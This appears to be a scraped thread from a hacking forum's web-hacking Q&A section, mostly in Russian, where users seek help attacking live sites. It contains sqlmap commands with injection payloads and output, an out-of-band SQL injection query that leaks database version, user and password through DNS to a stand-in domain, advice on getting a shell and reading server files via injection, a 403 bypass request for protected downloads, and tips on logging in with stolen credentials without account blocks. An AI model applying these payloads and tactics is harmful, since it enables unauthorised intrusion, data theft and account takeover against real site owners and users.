• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

unable to retrieve column names for table 'user' in database .
не хочет открывать таблицу, бд показывает - всего две таблицы.
пробовал параметры --parse-errors и т.д, предлагает запустить общую проверку столбцов которая идет 30-40 минут.
Код с оформлением (BB-коды):
unable to retrieve column names for table 'user' in database 'ssced1u4_ssc'
do you want to use common column existence check? [y/N/q] y
which common columns (wordlist) file do you want to use?
[1] default '/usr/share/sqlmap/data/txt/common-columns.txt' (press Enter)
[2] custom
запусти в 50 потоков и будет идти минуту
количество максимальных потоков можно редактировать в settings.py

Пожалуйста, обратите внимание, что пользователь заблокирован
запусти в 50 потоков и будет идти минуту
количество максимальных потоков можно редактировать в settings.py
Знаю, запускал в один и в 25 - все равно медленно. Не выдаёт дальше ничего в любом случае.

агрится на что то ваф. попробуй тамперы
Например?—tamper=space2comment? Просто по чувствам что вообще ничего не изменится. По факту дела он находит и бд и таблицы, но открыть таблицы не может просто из за названия глупого столбца

Подскажите как проверить очень много сайтов на трафик 20к сайтов надо примерно проверить
нужен способ хотя бы проверять разово по 100 сайтов на гео и количество трафика

Bcem Privet
First ever question. Be kind :)
I have links to files on a Woocommerce site and since they are in /woocommerce_uploads/ directory they are protected by .htaccess giving me a 403 error. Is there a way bypass the 403 error ?

I have tried Bypass-403 script from Github , It does give me some 200 responses but I can't make to download in real life.

I was thinking something in wordpress would help me bypass this protection

Spacibo

Лажу на разных не очень сайтах, с целью поиграться и набить скилл на SQLi
В итоге вроде всё получается, всё крутиться....
Решил пойти дальше и поиграться с шеллом, вот собственно вопрос - можно ли как то пролить шелл используя sqlmap, хотя везде права только USAGE ?
Спасибо

Подскажите как проверить очень много сайтов на трафик 20к сайтов надо примерно проверить
нужен способ хотя бы проверять разово по 100 сайтов на гео и количество трафика
https://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/116915/

еще можешь попробовать api similarweb/semrush/ahrefs/moz

how to quickly dump a database via TImed Based? If in the usual way it can take a month
if you can execute the query on your target:
SELECT load_file(CONCAT('\\\\',(SELECT+@@version),'.',(SELECT+user),'.', (SELECT+password),'.',example.com\\test.txt'))
This application will send a DNS request to the domain database_version.database_user.database_password.example.com

refrence: https://www.invicti.com/learn/out-of-band-sql-injection-oob-sqli/

Мне нужна помощь разностороннего специалиста)
Моя задача войти на сайт с использованием логина и пароля, но сайт просто так не пропустит, если у тебя есть данные, он может заблокировать аккаунт. Для попытки решения проблемы пробовал разные способы: разные прокси, разные антидетект браузеры, подбор юзер агента, но так и не нашел какого-то четкого понимания, почему блокируется аккаунт. Могу ввести 10 логов и не будет блокировки аккаунтов, а потом 10 подряд аккаунтов заблокируют
Может кто-то знает решение или может мне помочь?

Мне нужна помощь разностороннего специалиста)
Моя задача войти на сайт с использованием логина и пароля, но сайт просто так не пропустит, если у тебя есть данные, он может заблокировать аккаунт. Для попытки решения проблемы пробовал разные способы: разные прокси, разные антидетект браузеры, подбор юзер агента, но так и не нашел какого-то четкого понимания, почему блокируется аккаунт. Могу ввести 10 логов и не будет блокировки аккаунтов, а потом 10 подряд аккаунтов заблокируют
Может кто-то знает решение или может мне помочь?
Hard to narrow down with out pcap/har file or knowing more about the victim/target demographic. Are you entering the network or just web?

Есть пароль от бд. есть скуля которая ведет в нужную дб (естественно в локалхосте). Есть логин от бд, сама база содержит какие то пароли и хэши но в целом особо от них проку нет.
База mysql >=4.1 как говорит мне скульмап. Вопрос, можно ли зная рут пароль от бд и логин да и вообще все (кроме нужной мне таблицы wp_users), ссрфнуть куда-нибудь в сервер? file-read не читает, ну или я пока директорий не знаю. В идеале бы вообще шелл закинуть, но file-write не отрабатывает.
Привилегии при инъекции рутовые

Последнее редактирование:
Есть пароль от бд. есть скуля которая ведет в нужную дб (естественно в локалхосте). Есть логин от бд, сама база содержит какие то пароли и хэши но в целом особо от них проку нет.
База mysql >=4.1 как говорит мне скульмап. Вопрос, можно ли зная рут пароль от бд и логин да и вообще все (кроме нужной мне таблицы wp_users), ссрфнуть куда-нибудь в сервер? file-read не читает, ну или я пока директорий не знаю. В идеале бы вообще шелл закинуть, но file-write не отрабатывает.
Привилегии при инъекции рутовые
Проверяли права на запись у пользователя в таблице mysql?
Всегда можно не зная полного пути, прочитать конфигурационный файлы веб серверов, посмотреть логи и так далее (есть в интернете словари, которые можно пофазить).
Получив путь, уже можно пробовать делать запись в папку где есть на это права, для начала можно проверить записать в /tmp или /dev/shm/ и потом прочитать от туда.
Можно еще пробовать подключиться удаленно к бд (очень редко), но бывает такую возможность оставляют.

sqlmap -u "https://example.com/wp-json/ex/sign-in" --data="email=testing%40example.com&post_id=-1'%20OR%203*2*1=6%20AND%20000205=000205%20--%20&" --random-agent v3 --batch -D 2BASE -T WwW --dump --threads=5 --hex

[04:45:31] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[04:45:31] [INFO] fetching columns for table 'WwW' in database '2BASE'
[04:45:35] [INFO] resumed: 0
[04:45:35] [ERROR] unable to retrieve the number of columns for table 'WwW' in database '2BASE'
[04:45:35] [WARNING] unable to retrieve column names for table 'WwW' in database '2BASE'
do you want to use common column existence check? [y/N/q] N
[04:45:35] [WARNING] unable to enumerate the columns for table 'WwW' in database '2BASE'
[04:45:35] [WARNING] HTTP error codes detected during run:
422 (Unprocessable Entity) - 2 times
[04:45:35] [INFO] fetched data logged to text files under '/home/rer/.local/share/sqlmap/output/example.com'

[*] ending @ 04:45:35 /2024-08-31/

не дампит. пробовал --no-cast и --hex

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх